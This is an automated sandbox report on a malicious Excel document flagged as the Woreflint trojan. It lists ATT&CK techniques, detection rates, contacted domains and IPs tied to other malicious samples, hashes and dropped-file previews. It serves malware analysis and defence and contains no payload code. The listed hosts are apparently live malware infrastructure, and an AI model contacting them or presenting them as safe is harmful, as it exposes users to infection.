File source: statistic-1496367785.xls, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting2	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	System Information Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Rundll321	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting2	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
statistic-1496367785.xls	38%	Virustotal		Browse
statistic-1496367785.xls	35%	ReversingLabs	Document-Excel.Trojan.Woreflint

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
academy.haleemcampus.com	108.179.232.80	true	false		unknown
psq.com.mx	162.241.2.112	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.179.232.80	academy.haleemcampus.com	United States		46606	UNIFIEDLAYER-AS-1US	false
162.241.2.112	psq.com.mx	United States		26337	OIS1US	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	441923
Start date:	29.06.2021
Start time:	17:39:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	statistic-1496367785.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.evad.winXLS@5/13@2/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM
Warnings:	Show All Max analysis timeout: 220s exceeded, the analysis took too long TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 91.199.212.52, 13.107.4.50, 93.184.221.240, 192.35.177.64 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, wu.azureedge.net, afdap.au.au-msedge.net, au.au-msedge.net, crt.usertrust.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, apps.identrust.com Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
108.179.232.80	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse
	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse
	statistic-462462953.xls	Get hash	malicious	Browse
	statistic-462462953.xls	Get hash	malicious	Browse
	statistic-1403316517.xls	Get hash	malicious	Browse
	statistic-1403316517.xls	Get hash	malicious	Browse
	statistic-260077031.xls	Get hash	malicious	Browse
	statistic-260077031.xls	Get hash	malicious	Browse
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse
	statistic-1066846651.xls	Get hash	malicious	Browse
	statistic-1066846651.xls	Get hash	malicious	Browse
162.241.2.112	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse
	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse
	statistic-462462953.xls	Get hash	malicious	Browse
	statistic-462462953.xls	Get hash	malicious	Browse
	statistic-1403316517.xls	Get hash	malicious	Browse
	statistic-1403316517.xls	Get hash	malicious	Browse
	statistic-260077031.xls	Get hash	malicious	Browse
	statistic-260077031.xls	Get hash	malicious	Browse
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse
	statistic-1066846651.xls	Get hash	malicious	Browse
	statistic-1066846651.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
psq.com.mx	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-462462953.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-462462953.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-1403316517.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-1403316517.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-260077031.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-260077031.xls	Get hash	malicious	Browse	162.241.2.112
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-1066846651.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-1066846651.xls	Get hash	malicious	Browse	162.241.2.112
academy.haleemcampus.com	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse	108.179.232.80
	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse	108.179.232.80
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse	108.179.232.80
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-462462953.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-462462953.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-1403316517.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-1403316517.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-260077031.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-260077031.xls	Get hash	malicious	Browse	108.179.232.80
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse	108.179.232.80
	5c89f585_by_Libranalysis.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-1066846651.xls	Get hash	malicious	Browse	108.179.232.80
	statistic-1066846651.xls	Get hash	malicious	Browse	108.179.232.80

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OIS1US	Purchase Order.exe	Get hash	malicious	Browse	162.241.85.212
	DHL DOCUMENTS.exe	Get hash	malicious	Browse	162.241.85.210
	New_PO#98202139.xll	Get hash	malicious	Browse	162.241.2.66
	Payment_Swift00987.exe	Get hash	malicious	Browse	162.241.2.50
	Payment_Advice.exe	Get hash	malicious	Browse	162.241.2.50
	PO#8076.exe	Get hash	malicious	Browse	162.241.2.239
	New_Order.xll	Get hash	malicious	Browse	162.241.2.66
	PO36782110.xll	Get hash	malicious	Browse	162.241.2.66
	Product_Inquiry.xll	Get hash	malicious	Browse	162.241.2.66
	Request for quotation,PDF.exe	Get hash	malicious	Browse	162.241.203.147
	Request for quotation,PDF.exe	Get hash	malicious	Browse	162.241.203.147
	CARGO ARRIVAL NOTICE-MEDICOM AWB.exe	Get hash	malicious	Browse	162.241.85.231
	Payment_Advice.exe	Get hash	malicious	Browse	162.241.2.50
	ZRvY1UrHuF.xls	Get hash	malicious	Browse	162.241.203.185
	PO_no52071.exe	Get hash	malicious	Browse	162.241.2.122
	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	33c179ca_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	7fb953aa_by_Libranalysis.xls	Get hash	malicious	Browse	162.241.2.112
	statistic-462462953.xls	Get hash	malicious	Browse	162.241.2.112
UNIFIEDLAYER-AS-1US	4dvYb6Nq3y.exe	Get hash	malicious	Browse	50.87.238.189
	Remittance.xls	Get hash	malicious	Browse	162.241.120.180
	SecuriteInfo.com.Trojan.Win32.Save.a.27842.exe	Get hash	malicious	Browse	192.185.164.148
	SEOCHANG INDUSTRY Co., Ltd..exe	Get hash	malicious	Browse	162.241.24.206
	7R9igRpuL4.msi	Get hash	malicious	Browse	192.185.0.218
	nxinF8KuKS.exe	Get hash	malicious	Browse	192.185.16.56
	242jQP4mQP.exe	Get hash	malicious	Browse	50.87.248.20
	Halkbank.exe	Get hash	malicious	Browse	192.185.0.218
	HBenKsn2R8.exe	Get hash	malicious	Browse	96.125.162.104
	DC Viet Nam Order list 6-25-21.exe	Get hash	malicious	Browse	162.144.0.158
	Minutes of Meeting 22062021.exe	Get hash	malicious	Browse	108.167.156.42
	plan-1053707320.xlsb	Get hash	malicious	Browse	50.116.92.246
	plan-1053707320.xlsb	Get hash	malicious	Browse	50.116.92.246
	factura y factura de la v#U00eda a#U00e9rea.exe	Get hash	malicious	Browse	74.220.199.6
	T5gtQGRL8u.exe	Get hash	malicious	Browse	162.241.135.156
	PO 74230360.xlsb	Get hash	malicious	Browse	162.241.114.107
	PO 74230360.xlsb	Get hash	malicious	Browse	162.241.114.107
	PO 74230360.xlsb	Get hash	malicious	Browse	162.241.114.107
	plan-930205822.xlsb	Get hash	malicious	Browse	50.116.92.246
	7UXBXIr31E.exe	Get hash	malicious	Browse	192.185.198.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	New Purchase Order Air Shipment,pdf.pps	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Scan8378 CTIMAIL3.xlsx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	BNK1135000001.docx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Wilson-McShane Corporation ACH.xlsx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	PO20210628.xlsx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	PO 33015.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.18008.rtf	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Wilson-McShane Corporation ACH.xlsx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	PO20210624.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	order-0798.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	dridexxx.xlsb	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	vessel arrival notice.docx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	sf0X1hMF0g.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	sf0X1hMF0g.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Wilson-McShane Corporation ACH.xlsx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Bulk Order-0798.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	PO20210624.xlsx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Quote Requirment R2106131401 .docx	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	h2GeNTLcFz.xls	Get hash	malicious	Browse	108.179.232.80 162.241.2.112
	Purchase Order.doc	Get hash	malicious	Browse	108.179.232.80 162.241.2.112

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 61020 bytes, 1 file
Category:	dropped
Size (bytes):	61020
Entropy (8bit):	7.994886945086499
Encrypted:	true
SSDEEP:	1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
MD5:	2902DE11E30DCC620B184E3BB0F0C1CB
SHA1:	5D11D14A2558801A2688DC2D6DFAD39AC294F222
SHA-256:	E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
SHA-512:	EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.\|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xWS.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)............o..~4.6.......p.`Bt.(..V.N.!.p.C>..%.ySXY.>.`..f\|....'^K`\..e......j/..\|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...,.....7F$..~..S.6$S.-y....\|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1413
Entropy (8bit):	7.480496427934893
Encrypted:	false
SSDEEP:	24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
MD5:	285EC909C4AB0D2D57F5086B225799AA
SHA1:	D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
SHA-256:	68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
SHA-512:	4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0...0..i.......9rD:.".Q..l..15.0....H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0....H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)\|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.\|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1368898392817663
Encrypted:	false
SSDEEP:	6:kKBMc3CdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:q5kPlE99SNxAhUe0et
MD5:	5887C271965F719C89333C6163140C6D
SHA1:	CCC64032064157F9FFB5E4029658F2E54DBBE718
SHA-256:	41837F6E53AA0BFA346A01BC4097C81ADFB00AEE7C9980E2AFCEEDD875EA0C3E
SHA-512:	73F63D09327D62C58E80ECB52730FEE802D638DB419C5B0AC372ED55511C637CA00E597500E11E73A5131D1DF5BD6FD34DDAA681FD3DE3656D17A6DE4D05F064
Malicious:	false
Reputation:	low
Preview:	p...... .........k.Hm..(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	250
Entropy (8bit):	2.969287375524799
Encrypted:	false
SSDEEP:	3:kkFklNlutI9l1fllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9lm:kKfIHUQAbjMulgokaWbLOW+n
MD5:	22E86CEB0C5CC0960981167FFA58E3FD
SHA1:	6AACE3A60A040C637E47DE3693BE9238DCF03A60
SHA-256:	F8E8C226C714E1209B320FDD083890D545C0917173287C8CF4B653DA4BA0E3A2
SHA-512:	573813E03478AFBBB56B3BDA9E4324008953984262FC9D9B21AAEE41DEF08E4DC28F132DE592BB40E4790D6EA2982A62419A2B8918C65B9D1BE49694CC82926F
Malicious:	false
Reputation:	low
Preview:	p...... ....h.......Hm..(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
Size (bytes):	252
Entropy (8bit):	2.9725205059056137
Encrypted:	false
SSDEEP:	3:kkFklxb8vfllXlE/2S+HDHllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yR57d3:kK8+HDXliBAIdQZV7QvB
MD5:	1F793405F9FC9C81BBC7F99C7F5A8BDF
SHA1:	840F15829F9F926B3164AB9E8CBE2DFFDD519A37
SHA-256:	9E8D613136A5D033EEA184928671C325E5599AEB9D4B5BBB97AADA7BE3E6D38B
SHA-512:	08F1BC737857FA50D090FAD3297D8B54985FA61B97E190A0B3456EE4865DF097A0DCF6CEC56BDAA86B41CED1A291F826EE2CC51ABF2F2F3D318014684A49CE7F
Malicious:	false
Reputation:	low
Preview:	p...... ....`....p.Hm..(....................................................... ........S`..b......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.4.d.2.e.5.9.c.f.b.8.0."...

C:\Users\user\AppData\Local\Temp\BACE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	83002
Entropy (8bit):	7.898463614612142
Encrypted:	false
SSDEEP:	1536:oAGiMCBgFqO57Lav5F/U2SiwFNNWJsRE5vxjTIJv3R7:o04qO5PWzUWwhWISHIJv3R7
MD5:	95886F5C23351447BEE438643BB47432
SHA1:	E883CB7D47EDA8D717A9E5BEFBE2FC07A5466A48
SHA-256:	133BED2878DC1421701EFD5F935ECA31E278507D75D2C629A2349DC39CCAAC6F
SHA-512:	B1EA92BD35BA10F463F813DB2CB977E6818D8E87DCAA470F8B3573D6DD3FA6F85A41F54C05E81357D17E8CD84FD68BB960098E496AAA7DADACFD11B5107A26FC
Malicious:	false
Reputation:	low
Preview:	.U.n.0....?......(..r.izL.$...\K....I..V..p,;....vfvH...+k.G...k.Y3a.8.v].~.......pJ..ek@v1..iz....U;lY.R..9......p4...D...A..O&....Ku..l6....`Ru....v...\|..Z&B0Z.DB..S;$._,....%..C....H.4!jb.w..5.........6k...+"..)..9..Pei.{......C.y....0j....ZXr.....q9.~....fZ.a%.4.......s.4'.{Vx..T"/..#(..$../wR.Gt...Zqs..m.../.k......~.]...x..}=........~N.:..1.^DPw.b.{w..b..PQ<e.\|xx....!^.....R,G8...D..u .I.6..%....t...\|h(P{.y9.f........PK..........!.[:..............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CabD3B5.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 61020 bytes, 1 file
Category:	dropped
Size (bytes):	61020
Entropy (8bit):	7.994886945086499
Encrypted:	true
SSDEEP:	1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
MD5:	2902DE11E30DCC620B184E3BB0F0C1CB
SHA1:	5D11D14A2558801A2688DC2D6DFAD39AC294F222
SHA-256:	E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
SHA-512:	EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.\|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xWS.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)............o..~4.6.......p.`Bt.(..V.N.!.p.C>..%.ySXY.>.`..f\|....'^K`\..e......j/..\|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...,.....7F$..~..S.6$S.-y....\|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....

C:\Users\user\AppData\Local\Temp\TarD3B6.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	158974
